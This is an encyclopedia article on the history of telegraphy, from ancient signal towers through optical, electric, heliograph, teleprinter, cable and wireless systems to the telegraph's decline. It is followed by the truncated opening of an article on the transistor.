Telegraphy is the long-distance transmission of messages where the sender uses symbolic codes, known to the recipient, rather than a physical exchange of an object bearing the message. Thus flag semaphore is a method of telegraphy, whereas pigeon post is not. Ancient signalling systems, although sometimes quite extensive and sophisticated as in China, were generally not capable of transmitting arbitrary text messages. Possible messages were fixed and predetermined, so such systems are thus not true telegraphs. The earliest true telegraph put into widespread use was the Chappe telegraph, an optical telegraph invented by Claude Chappe in the late 18th century. The system was used extensively in France, and European nations occupied by France, during the Napoleonic era. The electric telegraph started to replace the optical telegraph in the mid-19th century. It was first taken up in Britain in the form of the Cooke and Wheatstone telegraph, initially used mostly as an aid to railway signalling. This was quickly followed by a different system developed in the United States by Samuel Morse. The electric telegraph was slower to develop in France due to the established optical telegraph system, but an electrical telegraph was put into use with a code compatible with the Chappe optical telegraph. The Morse system was adopted as the international standard in 1865, using a modified Morse code developed in Germany in 1848. The heliograph is a telegraph system using reflected sunlight for signalling. It was mainly used in areas where the electrical telegraph had not been established and generally used the same code. The most extensive heliograph network established was in Arizona and New Mexico during the Apache Wars. The heliograph was standard military equipment as late as World War II. Wireless telegraphy developed in the early 20th century became important for maritime use, and was a competitor to electrical telegraphy using submarine telegraph cables in international communications. Telegrams became a popular means of sending messages once telegraph prices had fallen sufficiently. Traffic became high enough to spur the development of automated systems—teleprinters and punched tape transmission. These systems led to new telegraph codes, starting with the Baudot code. However, telegrams were never able to compete with the letter post on price, and competition from the telephone, which removed their speed advantage, drove the telegraph into decline from 1920 onwards. The few remaining telegraph applications were largely taken over by alternatives on the internet towards the end of the 20th century. Terminology The word telegraph (from Ancient Greek: () 'at a distance' and () 'to write') was coined by the French inventor of the semaphore telegraph, Claude Chappe, who also coined the word semaphore. A telegraph is a device for transmitting and receiving messages over long distances, i.e., for telegraphy. The word telegraph alone generally refers to an electrical telegraph. Wireless telegraphy is transmission of messages over radio with telegraphic codes. Contrary to the extensive definition used by Chappe, Morse argued that the term telegraph can strictly be applied only to systems that transmit and record messages at a distance. This is to be distinguished from semaphore, which merely transmits messages. Smoke signals, for instance, are to be considered semaphore, not telegraph. According to Morse, telegraph dates only from 1832 when Pavel Schilling invented one of the earliest electrical telegraphs. A telegraph message sent by an electrical telegraph operator or telegrapher using Morse code (or a printing telegraph operator using plain text) was known as a telegram. A cablegram was a message sent by a submarine telegraph cable, often shortened to "cable" or "wire". The suffix -gram is derived from ancient Greek: (), meaning something written, i.e. telegram means something written at a distance and cablegram means something written via a cable, whereas telegraph implies the process of writing at a distance. Later, a Telex was a message sent by a Telex network, a switched network of teleprinters similar to a telephone network. A wirephoto or wire picture was a newspaper picture that was sent from a remote location by a facsimile telegraph. A diplomatic telegram, also known as a diplomatic cable, is a confidential communication between a diplomatic mission and the foreign ministry of its parent country. These continue to be called telegrams or cables regardless of the method used for transmission. History Early signalling Passing messages by signalling over distance is an ancient practice. One of the oldest examples is the signal towers of the Great Wall of China. In , signals could be sent by beacon fires or drum beats. By complex flag signalling had developed, and by the Han dynasty (200 BC – 220 AD) signallers had a choice of lights, flags, or gunshots to send signals. By the Tang dynasty (618–907) a message could be sent in 24 hours. The Ming dynasty (1368–1644) added artillery to the possible signals. While the signalling was complex (for instance, different-coloured flags could be used to indicate enemy strength), only predetermined messages could be sent. The Chinese signalling system extended well beyond the Great Wall. Signal towers away from the wall were used to give early warning of an attack. Others were built even further out as part of the protection of trade routes, especially the Silk Road. Signal fires were widely used in Europe and elsewhere for military purposes. The Roman army made frequent use of them, as did their enemies, and the remains of some of the stations still exist. Few details have been recorded of European/Mediterranean signalling systems and the possible messages. One of the few for which details are known is a system invented by Aeneas Tacticus (4th century BC). Tacticus's system had water filled pots at the two signal stations which were drained in synchronisation. Annotation on a floating scale indicated which message was being sent or received. Signals sent by means of torches indicated when to start and stop draining to keep the synchronisation. None of the signalling systems discussed above are true telegraphs in the sense of a system that can transmit arbitrary messages over arbitrary distances. Lines of signalling relay stations can send messages to any required distance, but all these systems are limited to one extent or another in the range of messages that they can send. A system like flag semaphore, with an alphabetic code, can certainly send any given message, but the system is designed for short-range communication between two persons. An engine order telegraph, used to send instructions from the bridge of a ship to the engine room, fails to meet both criteria; it has a limited distance and very simple message set. There was only one ancient signalling system described that does meet these criteria. That was a system using the Polybius square to encode an alphabet. Polybius (2nd century BC) suggested using two successive groups of torches to identify the coordinates of the letter of the alphabet being transmitted. The number of said torches held up signalled the grid square that contained the letter. There is no definite record of the system ever being used, but there are several passages in ancient texts that some think are suggestive. Holzmann and Pehrson, for instance, suggest that Livy is describing its use by Philip V of Macedon in 207 BC during the First Macedonian War. Nothing else that could be described as a true telegraph existed until the 17th century. Possibly the first alphabetic telegraph code in the modern era is due to Franz Kessler who published his work in 1616. Kessler used a lamp placed inside a barrel with a moveable shutter operated by the signaller. The signals were observed at a distance with the newly invented telescope. Optical telegraph An optical telegraph is a telegraph consisting of a line of stations in towers or natural high points which signal to each other by means of shutters or paddles. Signalling by means of indicator pointers was called semaphore. Early proposals for an optical telegraph system were made to the Royal Society by Robert Hooke in 1684 and were first implemented on an experimental level by Sir Richard Lovell Edgeworth in 1767. The first successful optical telegraph network was invented by Claude Chappe and operated in France from 1793. The two most extensive systems were Chappe's in France, with branches into neighbouring countries, and the system of Abraham Niclas Edelcrantz in Sweden. During 1790–1795, at the height of the French Revolution, France needed a swift and reliable communication system to thwart the war efforts of its enemies. In 1790, the Chappe brothers set about devising a system of communication that would allow the central government to receive intelligence and to transmit orders in the shortest possible time. On 2 March 1791, at 11 am, they sent the message "si vous réussissez, vous serez bientôt couverts de gloire" (If you succeed, you will soon bask in glory) between Brulon and Parce, a distance of . The first means used a combination of black and white panels, clocks, telescopes, and codebooks to send their message. In 1792, Claude was appointed Ingénieur-Télégraphiste and charged with establishing a line of stations between Paris and Lille, a distance of . It was used to carry dispatches for the war between France and Austria. In 1794, it brought news of a French capture of Condé-sur-l'Escaut from the Austrians less than an hour after it occurred. A decision to replace the system with an electric telegraph was made in 1846, but it took a decade before it was fully taken out of service. The fall of Sevastopol was reported by Chappe telegraph in 1855. The Prussian system was put into effect in the 1830s. However, they were highly dependent on good weather and daylight to work and even then could accommodate only about two words per minute. The last commercial semaphore link ceased operation in Sweden in 1880. As of 1895, France still operated coastal commercial semaphore telegraph stations, for ship-to-shore communication. Electrical telegraph The early ideas for an electric telegraph included in 1753 using electrostatic deflections of pith balls, proposals for electrochemical bubbles in acid by Campillo in 1804 and von Sömmering in 1809. The first experimental system over a substantial distance was by Ronalds in 1816 using an electrostatic generator. Ronalds offered his invention to the British Admiralty, but it was rejected as unnecessary, the existing optical telegraph connecting the Admiralty in London to their main fleet base in Portsmouth being deemed adequate for their purposes. As late as 1844, after the electrical telegraph had come into use, the Admiralty's optical telegraph was still used, although it was accepted that poor weather ruled it out on many days of the year. France had an extensive optical telegraph system dating from Napoleonic times and was even slower to take up electrical systems. Eventually, electrostatic telegraphs were abandoned in favour of electromagnetic systems. An early experimental system (Schilling, 1832) led to a proposal to establish a telegraph between St Petersburg and Kronstadt, but it was never completed. The first operative electric telegraph (Gauss and Weber, 1833) connected Göttingen Observatory to the Institute of Physics about 1 km away during experimental investigations of the geomagnetic field. The first commercial telegraph was by Cooke and Wheatstone following their English patent of 10 June 1837. It was demonstrated on the London and Birmingham Railway in July of the same year. In July 1839, a five-needle, five-wire system was installed to provide signalling over a record distance of 21 km on a section of the Great Western Railway between London Paddington station and West Drayton. However, in trying to get railway companies to take up his telegraph more widely for railway signalling, Cooke was rejected several times in favour of the more familiar, but shorter range, steam-powered pneumatic signalling. Even when his telegraph was taken up, it was considered experimental and the company backed out of a plan to finance extending the telegraph line out to Slough. However, this led to a breakthrough for the electric telegraph, as up to this point the Great Western had insisted on exclusive use and refused Cooke permission to open public telegraph offices. Cooke extended the line at his own expense and agreed that the railway could have free use of it in exchange for the right to open it up to the public. Most of the early electrical systems required multiple wires (Ronalds' system was an exception), but the system developed in the United States by Morse and Vail was a single-wire system. This was the system that first used the soon-to-become-ubiquitous Morse code. By 1844, the Morse system connected Baltimore to Washington, and by 1861 the west coast of the continent was connected to the east coast. The Cooke and Wheatstone telegraph, in a series of improvements, also ended up with a one-wire system, but still using their own code and needle displays. The electric telegraph quickly became a means of more general communication. The Morse system was officially adopted as the standard for continental European telegraphy in 1851 with a revised code, which later became the basis of International Morse Code. However, Great Britain and the British Empire continued to use the Cooke and Wheatstone system, in some places as late as the 1930s. Likewise, the United States continued to use American Morse code internally, requiring translation operators skilled in both codes for international messages. Railway telegraphy Railway signal telegraphy was developed in Britain from the 1840s onward. It was used to manage railway traffic and to prevent accidents as part of the railway signalling system. On 12 June 1837 Cooke and Wheatstone were awarded a patent for an electric telegraph. This was demonstrated between Euston railway station—where Wheatstone was located—and the engine house at Camden Town—where Cooke was stationed, together with Robert Stephenson, the London and Birmingham Railway line's chief engineer. The messages were for the operation of the rope-haulage system for pulling trains up the 1 in 77 bank. The world's first permanent railway telegraph was completed in July 1839 between London Paddington and West Drayton on the Great Western Railway with an electric telegraph using a four-needle system. The concept of a signalling "block" system was proposed by Cooke in 1842. Railway signal telegraphy did not change in essence from Cooke's initial concept for more than a century. In this system each line of railway was divided into sections or blocks of varying length. Entry to and exit from the block was to be authorised by electric telegraph and signalled by the line-side semaphore signals, so that only a single train could occupy the rails. In Cooke's original system, a single-needle telegraph was adapted to indicate just two messages: "Line Clear" and "Line Blocked". The signaller would adjust his line-side signals accordingly. As first implemented in 1844 each station had as many needles as there were stations on the line, giving a complete picture of the traffic. As lines expanded, a sequence of pairs of single-needle instruments were adopted, one pair for each block in each direction. Wigwag Wigwag is a form of flag signalling using a single flag. Unlike most forms of flag signalling, which are used over relatively short distances, wigwag is designed to maximise the distance covered—up to in some cases. Wigwag achieved this by using a large flag—a single flag can be held with both hands unlike flag semaphore which has a flag in each hand—and using motions rather than positions as its symbols since motions are more easily seen. It was invented by US Army surgeon Albert J. Myer in the 1850s who later became the first head of the Signal Corps. Wigwag was used extensively during the American Civil War where it filled a gap left by the electrical telegraph. Although the electrical telegraph had been in use for more than a decade, the network did not yet reach everywhere and portable, ruggedized equipment suitable for military use was not immediately available. Permanent or semi-permanent stations were established during the war, some of them towers of enormous height and the system was extensive enough to be described as a communications network. Heliograph A heliograph is a telegraph that transmits messages by flashing sunlight with a mirror, usually using Morse code. The idea for a telegraph of this type was first proposed as a modification of surveying equipment (Gauss, 1821). Various uses of mirrors were made for communication in the following years, mostly for military purposes, but the first device to become widely used was a heliograph with a moveable mirror (Mance, 1869). The system was used by the French during the 1870–71 siege of Paris, with night-time signalling using kerosene lamps as the source of light. An improved version (Begbie, 1870) was used by British military in many colonial wars, including the Anglo-Zulu War (1879). At some point, a morse key was added to the apparatus to give the operator the same degree of control as in the electric telegraph. Another type of heliograph was the heliostat or heliotrope fitted with a Colomb shutter. The heliostat was essentially a surveying instrument with a fixed mirror and so could not transmit a code by itself. The term heliostat is sometimes used as a synonym for heliograph because of this origin. The Colomb shutter (Bolton and Colomb, 1862) was originally invented to enable the transmission of morse code by signal lamp between Royal Navy ships at sea. The heliograph was heavily used by Nelson A. Miles in Arizona and New Mexico after he took over command (1886) of the fight against Geronimo and other Apache bands in the Apache Wars. Miles had previously set up the first heliograph line in the US between Fort Keogh and Fort Custer in Montana. He used the heliograph to fill in vast, thinly populated areas that were not covered by the electric telegraph. Twenty-six stations covered an area . In a test of the system, a message was relayed in four hours. Miles' enemies used smoke signals and flashes of sunlight from metal, but lacked a sophisticated telegraph code. The heliograph was ideal for use in the American Southwest due to its clear air and mountainous terrain on which stations could be located. It was found necessary to lengthen the morse dash (which is much shorter in American Morse code than in the modern International Morse code) to aid differentiating from the morse dot. Use of the heliograph declined from 1915 onwards, but remained in service in Britain and British Commonwealth countries for some time. Australian forces used the heliograph as late as 1942 in the Western Desert Campaign of World War II. Some form of heliograph was used by the mujahideen in the Soviet–Afghan War (1979–1989). Teleprinter A teleprinter is a telegraph machine that can send messages from a typewriter-like keyboard and print incoming messages in readable text with no need for the operators to be trained in the telegraph code used on the line. It developed from various earlier printing telegraphs and resulted in improved transmission speeds. The Morse telegraph (1837) was originally conceived as a system marking indentations on paper tape. A chemical telegraph making blue marks improved the speed of recording (Bain, 1846), but was delayed by a patent challenge from Morse. The first true printing telegraph (that is printing in plain text) used a spinning wheel of types in the manner of a daisy wheel printer (House, 1846, improved by Hughes, 1855). The system was adopted by Western Union. Early teleprinters used the Baudot code, a five-bit sequential binary code. This was a telegraph code developed for use on the French telegraph using a five-key keyboard (Baudot, 1874). Teleprinters generated the same code from a full alphanumeric keyboard. A feature of the Baudot code, and subsequent telegraph codes, was that, unlike Morse code, every character has a code of the same length making it more machine friendly. The Baudot code was used on the earliest ticker tape machines (Calahan, 1867), a system for mass distributing information on current price of publicly listed companies. Automated punched-tape transmission In a punched-tape system, the message is first typed onto punched tape using the code of the telegraph system—Morse code for instance. It is then, either immediately or at some later time, run through a transmission machine which sends the message to the telegraph network. Multiple messages can be sequentially recorded on the same run of tape. The advantage of doing this is that messages can be sent at a steady, fast rate making maximum use of the available telegraph lines. The economic advantage of doing this is greatest on long, busy routes where the cost of the extra step of preparing the tape is outweighed by the cost of providing more telegraph lines. The first machine to use punched tape was Bain's teleprinter (Bain, 1843), but the system saw only limited use. Later versions of Bain's system achieved speeds up to 1000 words per minute, far faster than a human operator could achieve. The first widely used system (Wheatstone, 1858) was first put into service with the British General Post Office in 1867. A novel feature of the Wheatstone system was the use of bipolar encoding. That is, both positive and negative polarity voltages were used. Bipolar encoding has several advantages, one of which is that it permits duplex communication. The Wheatstone tape reader was capable of a speed of 400 words per minute. Oceanic telegraph cables A worldwide communication network meant that telegraph cables would have to be laid across oceans. On land cables could be run uninsulated suspended from poles. Underwater, a good insulator that was both flexible and capable of resisting the ingress of seawater was required. A solution presented itself with gutta-percha, a natural rubber from the Palaquium gutta tree, after William Montgomerie sent samples to London from Singapore in 1843. The new material was tested by Michael Faraday and in 1845 Wheatstone suggested that it should be used on the cable planned between Dover and Calais by John Watkins Brett. The idea was proved viable when the South Eastern Railway company successfully tested a gutta-percha insulated cable with telegraph messages to a ship off the coast of Folkestone. The cable to France was laid in 1850 but was almost immediately severed by a French fishing vessel. It was relaid the next year and connections to Ireland and the Low Countries soon followed. Getting a cable across the Atlantic Ocean proved much more difficult. The Atlantic Telegraph Company, formed in London in 1856, had several failed attempts. A cable laid in 1858 worked poorly for a few days, sometimes taking all day to send a message despite the use of the highly sensitive mirror galvanometer developed by William Thomson (the future Lord Kelvin) before being destroyed by applying too high a voltage. Its failure and slow speed of transmission prompted Thomson and Oliver Heaviside to find better mathematical descriptions of long transmission lines. The company finally succeeded in 1866 with an improved cable laid by SS Great Eastern, the largest ship of its day, designed by Isambard Kingdom Brunel. An overland telegraph from Britain to India was first connected in 1866 but was unreliable so a submarine telegraph cable was connected in 1870. Several telegraph companies were combined to form the Eastern Telegraph Company in 1872. Australia was first linked to the rest of the world in October 1872 by a submarine telegraph cable at Darwin. From the 1850s until well into the 20th century, British submarine cable systems dominated the world system. This was set out as a formal strategic goal, which became known as the All Red Line. In 1896, there were thirty cable-laying ships in the world and twenty-four of them were owned by British companies. In 1892, British companies owned and operated two-thirds of the world's cables and by 1923, their share was still 42.7 percent. During World War I, Britain's telegraph communications were almost completely uninterrupted while it was able to quickly cut Germany's cables worldwide. Facsimile In 1843, Scottish inventor Alexander Bain invented a device that could be considered the first facsimile machine. He called his invention a "recording telegraph". Bain's telegraph was able to transmit images by electrical wires. Frederick Bakewell made several improvements on Bain's design and demonstrated a telefax machine. In 1855, an Italian priest, Giovanni Caselli, also created an electric telegraph that could transmit images. Caselli called his invention "Pantelegraph". Pantelegraph was successfully tested and approved for a telegraph line between Paris and Lyon. In 1881, English inventor Shelford Bidwell constructed the scanning phototelegraph that was the first telefax machine to scan any two-dimensional original, not requiring manual plotting or drawing. Around 1900, German physicist Arthur Korn invented the Bildtelegraph widespread in continental Europe especially since a widely noticed transmission of a wanted-person photograph from Paris to London in 1908 used until the wider distribution of the radiofax. Its main competitors were the Bélinographe by Édouard Belin first, then since the 1930s, the Hellschreiber, invented in 1929 by German inventor Rudolf Hell, a pioneer in mechanical image scanning and transmission. Wireless telegraphy The late 1880s through to the 1890s saw the discovery and then development of a newly understood phenomenon into a form of wireless telegraphy, called Hertzian wave wireless telegraphy, radiotelegraphy, or (later) simply "radio". Between 1886 and 1888, Heinrich Rudolf Hertz published the results of his experiments where he was able to transmit electromagnetic waves (radio waves) through the air, proving James Clerk Maxwell's 1873 theory of electromagnetic radiation. Many scientists and inventors experimented with this new phenomenon but the consensus was that these new waves (similar to light) would be just as short range as light, and, therefore, useless for long range communication. At the end of 1894, the young Italian inventor Guglielmo Marconi began working on the idea of building a commercial wireless telegraphy system based on the use of Hertzian waves (radio waves), a line of inquiry that he noted other inventors did not seem to be pursuing. Building on the ideas of previous scientists and inventors Marconi re-engineered their apparatus by trial and error attempting to build a radio-based wireless telegraphic system that would function the same as wired telegraphy. He would work on the system through 1895 in his lab and then in field tests making improvements to extend its range. After many breakthroughs, including applying the wired telegraphy concept of grounding the transmitter and receiver, Marconi was able, by early 1896, to transmit radio far beyond the short ranges that had been predicted. Having failed to interest the Italian government, the 22-year-old inventor brought his telegraphy system to Britain in 1896 and met William Preece, a Welshman, who was a major figure in the field and Chief Engineer of the General Post Office. A series of demonstrations for the British government followed—by March 1897, Marconi had transmitted Morse code signals over a distance of about across Salisbury Plain. On 13 May 1897, Marconi, assisted by George Kemp, a Cardiff Post Office engineer, transmitted the first wireless signals over water to Lavernock (near Penarth in Wales) from Flat Holm. His star rising, he was soon sending signals across the English Channel (1899), from shore to ship (1899) and finally across the Atlantic (1901). A study of these demonstrations of radio, with scientists trying to work out how a phenomenon predicted to have a short range could transmit "over the horizon", led to the discovery of a radio reflecting layer in the Earth's atmosphere in 1902, later called the ionosphere. Radiotelegraphy proved effective for rescue work in sea disasters by enabling effective communication between ships and from ship to shore. In 1904, Marconi began the first commercial service to transmit nightly news summaries to subscribing ships, which could incorporate them into their on-board newspapers. A regular transatlantic radio-telegraph service was finally begun on 17 October 1907. Notably, Marconi's apparatus was used to help rescue efforts after the sinking of . Britain's postmaster-general summed up, referring to the Titanic disaster, "Those who have been saved, have been saved through one man, Mr. Marconi...and his marvellous invention." Non-radio wireless telegraphy The successful development of radiotelegraphy was preceded by a 50-year history of ingenious but ultimately unsuccessful experiments by inventors to achieve wireless telegraphy by other means. Ground, water, and air conduction Several wireless electrical signaling schemes based on the (sometimes erroneous) idea that electric currents could be conducted long-range through water, ground, and air were investigated for telegraphy before practical radio systems became available. The original telegraph lines used two wires between the two stations to form a complete electrical circuit or "loop". In 1837, however, Carl August von Steinheil of Munich, Germany, found that by connecting one leg of the apparatus at each station to metal plates buried in the ground, he could eliminate one wire and use a single wire for telegraphic communication. This led to speculation that it might be possible to eliminate both wires and therefore transmit telegraph signals through the ground without any wires connecting the stations. Other attempts were made to send the electric current through bodies of water, to span rivers, for example. Prominent experimenters along these lines included Samuel F. B. Morse in the United States and James Bowman Lindsay in Great Britain, who in August 1854, was able to demonstrate transmission across a mill dam at a distance of . US inventors William Henry Ward (1871) and Mahlon Loomis (1872) developed electrical conduction systems based on the erroneous belief that there was an electrified atmospheric stratum accessible at low altitude. They thought atmosphere current, connected with a return path using "Earth currents" would allow for wireless telegraphy as well as supply power for the telegraph, doing away with artificial batteries. A more practical demonstration of wireless transmission via conduction came in Amos Dolbear's 1879 magneto electric telephone that used ground conduction to transmit over a distance of a quarter of a mile. In the 1890s inventor Nikola Tesla worked on an air and ground conduction wireless electric power transmission system, similar to Loomis', which he planned to include wireless telegraphy. Tesla's experiments had led him to incorrectly conclude that he could use the entire globe of the Earth to conduct electrical energy and his 1901 large scale application of his ideas, a high-voltage wireless power station, now called Wardenclyffe Tower, lost funding and was abandoned after a few years. Telegraphic communication using earth conductivity was eventually found to be limited to impractically short distances, as was communication conducted through water, or between trenches during World War I. Electrostatic and electromagnetic induction Both electrostatic and electromagnetic induction were used to develop wireless telegraph systems that saw limited commercial application. In the United States, Thomas Edison, in the mid-1880s, patented an electromagnetic induction system he called "grasshopper telegraphy", which allowed telegraphic signals to jump the short distance between a running train and telegraph wires running parallel to the tracks. This system was successful technically but not economically, as there turned out to be little interest by train travelers in the use of an on-board telegraph service. During the Great Blizzard of 1888, this system was used to send and receive wireless messages from trains buried in snowdrifts. The disabled trains were able to maintain communications via their Edison induction wireless telegraph systems, perhaps the first successful use of wireless telegraphy to send distress calls. Edison would also help to patent a ship-to-shore communication system based on electrostatic induction. The most successful creator of an electromagnetic induction telegraph system was William Preece, chief engineer of Post Office Telegraphs of the General Post Office (GPO) in the United Kingdom. Preece first noticed the effect in 1884 when overhead telegraph wires in Grays Inn Road were accidentally carrying messages sent on buried cables. Tests in Newcastle succeeded in sending a quarter of a mile using parallel rectangles of wire. In tests across the Bristol Channel in 1892, Preece was able to telegraph across gaps of about . However, his induction system required extensive lengths of antenna wires, many kilometers long, at both the sending and receiving ends. The length of those sending and receiving wires needed to be about the same length as the width of the water or land to be spanned. For example, for Preece's station to span the English Channel from Dover, England, to the coast of France would require sending and receiving wires of about along the two coasts. These facts made the system impractical on ships, boats, and ordinary islands, which are much smaller than Great Britain or Greenland. Also, the relatively short distances that a practical Preece system could span meant that it had few advantages over underwater telegraph cables. Telegram services A telegram service is a company or public entity that delivers telegraphed messages directly to the recipient. Telegram services were not inaugurated until electric telegraphy became available. Earlier optical systems were largely limited to official government and military purposes. Historically, telegrams were sent between a network of interconnected telegraph offices. A person visiting a local telegraph office paid by the word to have a message telegraphed to another office and delivered to the addressee on a paper form. Messages (i.e. telegrams) sent by telegraph could be delivered by telegraph messenger faster than mail, and even in the telephone age, the telegram remained popular for social and business correspondence. At their peak in 1929, an estimated 200 million telegrams were sent. In 1919, the Central Bureau for Registered Addresses was established in the financial district of New York City. The bureau was created to ease the growing problem of messages being delivered to the wrong recipients. To combat this issue, the bureau offered telegraph customers the option to register unique code names for their telegraph addresses. Customers were charged $2.50 per year per code. By 1934, 28,000 codes had been registered. Telegram services still operate in much of the world (see worldwide use of telegrams by country), but e-mail and text messaging have rendered telegrams obsolete in many countries, and the number of telegrams sent annually has been declining rapidly since the 1980s. Where telegram services still exist, the transmission method between offices is no longer by telegraph, but by telex or IP link. Telegram length As telegrams have been traditionally charged by the word, messages were often abbreviated to pack information into the smallest possible number of words, in what came to be called "telegram style". The average length of a telegram in the 1900s in the US was 11.93 words; more than half of the messages were 10 words or fewer. According to another study, the mean length of the telegrams sent in the UK before 1950 was 14.6 words or 78.8 characters. For German telegrams, the mean length is 11.5 words or 72.4 characters. At the end of the 19th century, the average length of a German telegram was calculated as 14.2 words. Telex Telex (telegraph exchange) was a public switched network of teleprinters. It used rotary-telephone-style pulse dialling for automatic routing through the network. It initially used the Baudot code for messages. Telex development began in Germany in 1926, becoming an operational service in 1933 run by the (the German imperial postal service). It had a speed of 50 baud—approximately 66 words per minute. Up to 25 telex channels could share a single long-distance telephone channel by using voice frequency telegraphy multiplexing, making telex the least expensive method of reliable long-distance communication. Telex was introduced into Canada in July 1957, and the United States in 1958. A new code, ASCII, was introduced in 1963 by the American Standards Association. ASCII was a seven-bit code and could thus support a larger number of characters than Baudot. In particular, ASCII supported upper and lower case whereas Baudot was upper case only. Decline Telegraph use began to permanently decline around 1920. The decline began with the growth of the use of the telephone. Ironically, the invention of the telephone grew out of the development of the harmonic telegraph, a device which was supposed to increase the efficiency of telegraph transmission and improve the profits of telegraph companies. Western Union gave up its patent battle with Alexander Graham Bell because it believed the telephone was not a threat to its telegraph business. The Bell Telephone Company was formed in 1877 and had 230 subscribers which grew to 30,000 by 1880. By 1886 there were a quarter of a million phones worldwide, and nearly 2 million by 1900. The decline was briefly postponed by the rise of special occasion congratulatory telegrams. Traffic continued to grow between 1867 and 1893 despite the introduction of the telephone in this period, but by 1900 the telegraph was definitely in decline. There was a brief resurgence in telegraphy during World War I but the decline continued as the world entered the Great Depression years of the 1930s. After the Second World War new technology improved communication in the telegraph industry. Telegraph lines continued to be an important means of distributing news feeds from news agencies by teleprinter machine until the rise of the internet in the 1990s. For Western Union, one service remained highly profitable—the wire transfer of money. This service kept Western Union in business long after the telegraph had ceased to be important. In the modern era, the telegraph that began in 1837 has been gradually replaced by digital data transmission based on computer information systems. Social implications Optical telegraph lines were installed by governments, often for a military purpose, and reserved for official use only. In many countries, this situation continued after the introduction of the electric telegraph. Starting in Germany and the UK, electric telegraph lines were installed by railway companies. Railway use quickly led to private telegraph companies in the UK and the US offering a telegraph service to the public using telegraph along railway lines. The availability of this new form of communication brought on widespread social and economic changes. The electric telegraph freed communication from the time constraints of postal mail and revolutionized the global economy and society. By the end of the 19th century, the telegraph was becoming an increasingly common medium of communication for ordinary people. The telegraph isolated the message (information) from the physical movement of objects or the process. There was some fear of the new technology. According to author Allan J. Kimmel, some people "feared that the telegraph would erode the quality of public discourse through the transmission of irrelevant, context-free information." Henry David Thoreau thought of the Transatlantic cable "...perchance the first news that will leak through into the broad flapping American ear will be that Princess Adelaide has the whooping cough." Kimmel says these fears anticipate many of the characteristics of the modern internet age. Initially, the telegraph was expensive, but it had an enormous effect on three industries: finance, newspapers, and railways. Telegraphy facilitated the growth of organizations "in the railroads, consolidated financial and commodity markets, and reduced information costs within and between firms". In the US, there were 200 to 300 stock exchanges before the telegraph, but most of these were unnecessary and unprofitable once the telegraph made financial transactions at a distance easy and drove down transaction costs. This immense growth in the business sectors influenced society to embrace the use of telegrams once the cost had fallen. Worldwide telegraphy changed the gathering of information for news reporting. Journalists were using the telegraph for war reporting as early as 1846 when the Mexican–American War broke out. News agencies were formed, such as the Associated Press, for the purpose of reporting news by telegraph. Messages and information would now travel far and wide, and the telegraph demanded a language "stripped of the local, the regional; and colloquial", to better facilitate a worldwide media language. Media language had to be standardized, which led to the gradual disappearance of different forms of speech and styles of journalism and storytelling. The spread of the railways created a need for an accurate standard time to replace local standards based on local noon. The means of achieving this synchronisation was the telegraph. This emphasis on precise time has led to major societal changes such as the concept of the time value of money. During the telegraph era there was widespread employment of women in telegraphy. The shortage of men to work as telegraph operators in the American Civil War opened up the opportunity for women of a well-paid skilled job. In the UK, there was widespread employment of women as telegraph operators even earlier – from the 1850s by all the major companies. The attraction of women for the telegraph companies was that they could pay them less than men. Nevertheless, the jobs were popular with women for the same reason as in the US; most other work available for women was very poorly paid. The economic impact of the telegraph was not much studied by economic historians until parallels started to be drawn with the rise of the internet. In fact, the electric telegraph was as important as the invention of printing in this respect. According to economist Ronnie J. Phillips, the reason for this may be that institutional economists paid more attention to advances that required greater capital investment. The investment required to build railways, for instance, is orders of magnitude greater than that for the telegraph. Popular culture The optical telegraph was quickly forgotten once it went out of service. While it was in operation, it was very familiar to the public across Europe. Examples appear in many paintings of the period. Poems include "" by Victor Hugo, and the collection by is dedicated to the telegraph. In novels, the telegraph is a major component in Lucien Leuwen by Stendhal, and it features in The Count of Monte Cristo, by Alexandre Dumas. Joseph Chudy's 1796 opera, , was written to publicise Chudy's telegraph (a binary code with five lamps) when it became clear that Chappe's design was being taken up. Rudyard Kipling wrote a poem in praise of submarine telegraph cables; "And a new Word runs between: whispering, 'Let us be one! Kipling's poem represented a widespread idea in the late nineteenth century that international telegraphy (and new technology in general) would bring peace and mutual understanding to the world. When a submarine telegraph cable first connected America and Britain, the New York Post declared: Newspaper names Numerous newspapers and news outlets in various countries, such as The Daily Telegraph in Britain, The Telegraph in India, in the Netherlands, and the Jewish Telegraphic Agency in the US, were given names which include the word "telegraph" due to their having received news by means of electric telegraphy. Some of these names are retained even though different means of news acquisition are now used.
Technology
Media and communication
null
30011
https://en.wikipedia.org/wiki/Transistor
Transistor
A transistor is a semiconductor device used to amplify or switch electrical signals and power. It is one of the basic building blocks of modern electronics. It is composed of semiconductor material, usually with at least three terminals for connection to an electronic circuit. A voltage or current applied to one pair of the transistor's terminals controls the current through another pair of terminals. Because the controlled (output) power can be higher than the controlling (input) power, a transistor can amplify a signal. Some transistors are packaged individually, but many more in miniature form are found embedded in integrated circuits. Because transistors are the key active components in practically all modern electronics, many people consider them one of the 20th century's greatest inventions. Physicist Julius Edgar Lilienfeld proposed the concept of a field-effect transistor (FET) in 1925, but it was not possible to construct a working device at that time. The first working device was a point-contact transistor invented in 1947 by physicists John Bardeen, Walter Brattain, and William Shockley at Bell Labs who shared the 1956 Nobel Prize in Physics for their achievement. The most widely used type of transistor, the metal–oxide–semiconductor field-effect transistor (MOSFET), was invented at Bell Labs between 1955 and 1960. Transistors revolutionized the field of electronics and paved the way for smaller and cheaper radios, calculators, computers, and other electronic devices. Most transistors are made from very pure silicon, and some from germanium, but certain other semiconductor materials are sometimes used. A transistor may have only one kind of charge carrier in a field-effect transistor, or may have two kinds of charge carriers in bipolar junction transistor devices. Compared with the vacuum tube, transistors are generally smaller and require less power to operate. Certain vacuum tubes have advantages over transistors at very high operating frequencies or high operating voltages, such as Traveling-wave tubes and Gyrotrons. Many types of transistors are made to standardized specifications by multiple manufacturers. History The thermionic triode, a vacuum tube invented in 1907, enabled amplified radio technology and long-distance telephony. The triode, however, was a fragile device that consumed a substantial amount of power. In 1909, physicist William Eccles discovered the crystal diode oscillator. Physicist Julius Edgar Lilienfeld filed a patent for a field-effect transistor (FET) in Canada in 1925, intended as a solid-state replacement for the triode. He filed identical patents in the United States in 1926 and 1928. However, he did not publish any research articles about his devices nor did his patents cite any specific examples of a working prototype. Because the production of high-quality semiconductor materials was still decades away, Lilienfeld's solid-state amplifier ideas would not have found practical use in the 1920s and 1930s, even if such a device had been built. In 1934, inventor Oskar Heil patented a similar device in Europe. Bipolar transistors From November 17 to December 23, 1947, John Bardeen and Walter Brattain at AT&T's Bell Labs in Murray Hill, New Jersey, performed 